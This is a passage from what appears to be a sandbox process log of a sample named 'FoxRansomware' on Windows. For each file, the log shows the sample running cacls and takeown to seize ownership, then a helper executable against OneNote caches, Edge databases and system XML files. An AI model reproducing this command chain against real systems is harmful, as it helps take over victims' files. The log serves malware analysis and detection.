C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008F.bin" /E /G Admin:F /C3⤵PID:192
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008F.bin"3⤵
- Modifies file permissions
PID:5940
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "0000008F.bin" -nobanner3⤵PID:5588
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "0000008F.bin" -nobanner4⤵PID:5616
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:820
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000095.bin""2⤵
- System Location Discovery: System Language Discovery
PID:6240 -
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000095.bin" /E /G Admin:F /C3⤵PID:6212
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000095.bin"3⤵PID:3600
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "00000095.bin" -nobanner3⤵PID:3492
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "00000095.bin" -nobanner4⤵PID:5100
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5796
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A0.bin""2⤵PID:7104
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A0.bin" /E /G Admin:F /C3⤵PID:3620
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A0.bin"3⤵
- Modifies file permissions
PID:6180
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "000000A0.bin" -nobanner3⤵
- System Location Discovery: System Language Discovery
PID:1684 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "000000A0.bin" -nobanner4⤵PID:6300
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5608
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""2⤵PID:5268
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C3⤵PID:4784
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"3⤵PID:6592
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "background.png" -nobanner3⤵PID:5816
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "background.png" -nobanner4⤵PID:6272
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6336
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml""2⤵PID:6584
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml" /E /G Admin:F /C3⤵PID:6468
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml"3⤵PID:5792
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "resource.xml" -nobanner3⤵PID:6288
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "resource.xml" -nobanner4⤵PID:6996
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5448
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\TileDataLayer\Database\vedatamodel.edb""2⤵PID:7500
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\TileDataLayer\Database\vedatamodel.edb" /E /G Admin:F /C3⤵PID:6964
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\TileDataLayer\Database\vedatamodel.edb"3⤵
- Modifies file permissions
PID:6460
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "vedatamodel.edb" -nobanner3⤵PID:4252
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "vedatamodel.edb" -nobanner4⤵PID:6072
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6424
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml""2⤵PID:6560
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml" /E /G Admin:F /C3⤵PID:6676
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml"3⤵
- Modifies file permissions
PID:8188
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "resource.xml" -nobanner3⤵PID:6420
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "resource.xml" -nobanner4⤵PID:6108
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6536
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\ProgramData\Microsoft\Diagnosis\DownloadedSettings\telemetry.ASM-WindowsDefault.json""2⤵PID:6836
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Diagnosis\DownloadedSettings\telemetry.ASM-WindowsDefault.json" /E /G Admin:F /C3⤵PID:6792
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Diagnosis\DownloadedSettings\telemetry.ASM-WindowsDefault.json"3⤵PID:6904
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "telemetry.ASM-WindowsDefault.json" -nobanner3⤵PID:6748
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "telemetry.ASM-WindowsDefault.json" -nobanner4⤵PID:6696
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6888
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\User\Default\Indexed DB\temp.edb""2⤵PID:7000
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\User\Default\Indexed DB\temp.edb" /E /G Admin:F /C3⤵PID:5400
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\User\Default\Indexed DB\temp.edb"3⤵PID:6752
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "temp.edb" -nobanner3⤵PID:1380
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "temp.edb" -nobanner4⤵PID:5328
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6960
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\ProgramData\Microsoft\SmsRouter\MessageStore\edbres00001.jrs""2⤵PID:6320
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\SmsRouter\MessageStore\edbres00001.jrs" /E /G Admin:F /C3⤵PID:7412
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\SmsRouter\MessageStore\edbres00001.jrs"3⤵PID:7548
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "edbres00001.jrs" -nobanner3⤵PID:7524
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "edbres00001.jrs" -nobanner4⤵PID:7516
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7392
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win32.xml""2⤵PID:2828
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win32.xml" /E /G Admin:F /C3⤵PID:7200
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win32.xml"3⤵
- Modifies file permissions
PID:5708
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "MicrosoftLync2013Win32.xml" -nobanner3⤵PID:344
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "MicrosoftLync2013Win32.xml" -nobanner4⤵PID:6952
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵
- System Location Discovery: System Language Discovery
PID:5140
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win64.xml""2⤵PID:3680
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win64.xml" /E /G Admin:F /C3⤵
- System Location Discovery: System Language Discovery
PID:5056
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win64.xml"3⤵
- Modifies file permissions
PID:7456
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "MicrosoftOffice2013Win64.xml" -nobanner3⤵PID:2000
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "MicrosoftOffice2013Win64.xml" -nobanner4⤵PID:7228
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7420
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win64.xml""2⤵PID:7176
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win64.xml" /E /G Admin:F /C3⤵PID:6620
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win64.xml"3⤵PID:7772
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "MicrosoftSkypeForBusiness2016Win64.xml" -nobanner3⤵PID:7252
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "MicrosoftSkypeForBusiness2016Win64.xml" -nobanner4⤵PID:1848
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5540
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\User\Default\Indexed DB\IndexedDB.edb""2⤵PID:7640
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\User\Default\Indexed DB\IndexedDB.edb" /E /G Admin:F /C3⤵PID:260
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\User\Default\Indexed DB\IndexedDB.edb"3⤵
- Modifies file permissions
PID:7264
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "IndexedDB.edb" -nobanner3⤵PID:7304
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "IndexedDB.edb" -nobanner4⤵PID:7344
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2044
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\TileDataLayer\Database\vedatamodel.jfm""2⤵PID:7588
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\TileDataLayer\Database\vedatamodel.jfm" /E /G Admin:F /C3⤵PID:5428
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\TileDataLayer\Database\vedatamodel.jfm"3⤵PID:4800
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "vedatamodel.jfm" -nobanner3⤵PID:4772
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "vedatamodel.jfm" -nobanner4⤵PID:7580
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7692
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000006.bin""2⤵PID:6480
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000006.bin" /E /G Admin:F /C3⤵PID:7912
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000006.bin"3⤵PID:8060
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "00000006.bin" -nobanner3⤵PID:7996
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "00000006.bin" -nobanner4⤵PID:7892
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:8048
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000J.bin""2⤵PID:7704
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000J.bin" /E /G Admin:F /C3⤵PID:8064
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000J.bin"3⤵PID:8180
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "0000000J.bin" -nobanner3⤵PID:5548
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "0000000J.bin" -nobanner4⤵PID:7124
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:8172
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000U.bin""2⤵PID:8080
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000U.bin" /E /G Admin:F /C3⤵PID:8144
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000U.bin"3⤵
- Modifies file permissions
PID:8076
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "0000000U.bin" -nobanner3⤵PID:6860
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "0000000U.bin" -nobanner4⤵PID:5188
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7064
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000018.bin""2⤵PID:4224
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000018.bin" /E /G Admin:F /C3⤵PID:7916
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000018.bin"3⤵PID:7804
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "00000018.bin" -nobanner3⤵PID:2812
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "00000018.bin" -nobanner4⤵PID:1664
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5500
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000052.bin""2⤵PID:5716
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000052.bin" /E /G Admin:F /C3⤵PID:8168
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000052.bin"3⤵PID:7116
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "00000052.bin" -nobanner3⤵PID:6052
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "00000052.bin" -nobanner4⤵PID:4340
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7924
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml""2⤵PID:5516
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml" /E /G Admin:F /C3⤵PID:6120
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml"3⤵PID:6140
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "behavior.xml" -nobanner3⤵PID:5036
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "behavior.xml" -nobanner4⤵PID:5536
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5776
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\uk-UA\resource.xml""2⤵PID:4228
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\uk-UA\resource.xml" /E /G Admin:F /C3⤵PID:5872
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\uk-UA\resource.xml"3⤵PID:5424
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "resource.xml" -nobanner3⤵PID:5476
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "resource.xml" -nobanner4⤵PID:5352
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7120
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\All Users\Microsoft\Diagnosis\DownloadedScenarios\WINDOWS.PERFTRACKESCALATIONS.xml""2⤵PID:5688
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Diagnosis\DownloadedScenarios\WINDOWS.PERFTRACKESCALATIONS.xml" /E /G Admin:F /C3⤵PID:5236
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Diagnosis\DownloadedScenarios\WINDOWS.PERFTRACKESCALATIONS.xml"3⤵PID:2992
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "WINDOWS.PERFTRACKESCALATIONS.xml" -nobanner3⤵PID:5644
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "WINDOWS.PERFTRACKESCALATIONS.xml" -nobanner4⤵PID:200
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5244
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\EaseOfAccessSettings2013.xml""2⤵PID:4312
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\EaseOfAccessSettings2013.xml" /E /G Admin:F /C3⤵PID:4980
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\EaseOfAccessSettings2013.xml"3⤵PID:5152
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "EaseOfAccessSettings2013.xml" -nobanner3⤵PID:1248
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "EaseOfAccessSettings2013.xml" -nobanner4⤵PID:5224
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5556
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin64.xml""2⤵PID:6056
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin64.xml" /E /G Admin:F /C3⤵PID:404
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin64.xml"3⤵
- Modifies file permissions
PID:5620
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "MicrosoftOffice2013BackupWin64.xml" -nobanner3⤵PID:1460
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "MicrosoftOffice2013BackupWin64.xml" -nobanner4⤵PID:5584
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5524
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin64.xml""2⤵PID:7132
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin64.xml" /E /G Admin:F /C3⤵PID:5888
-
-
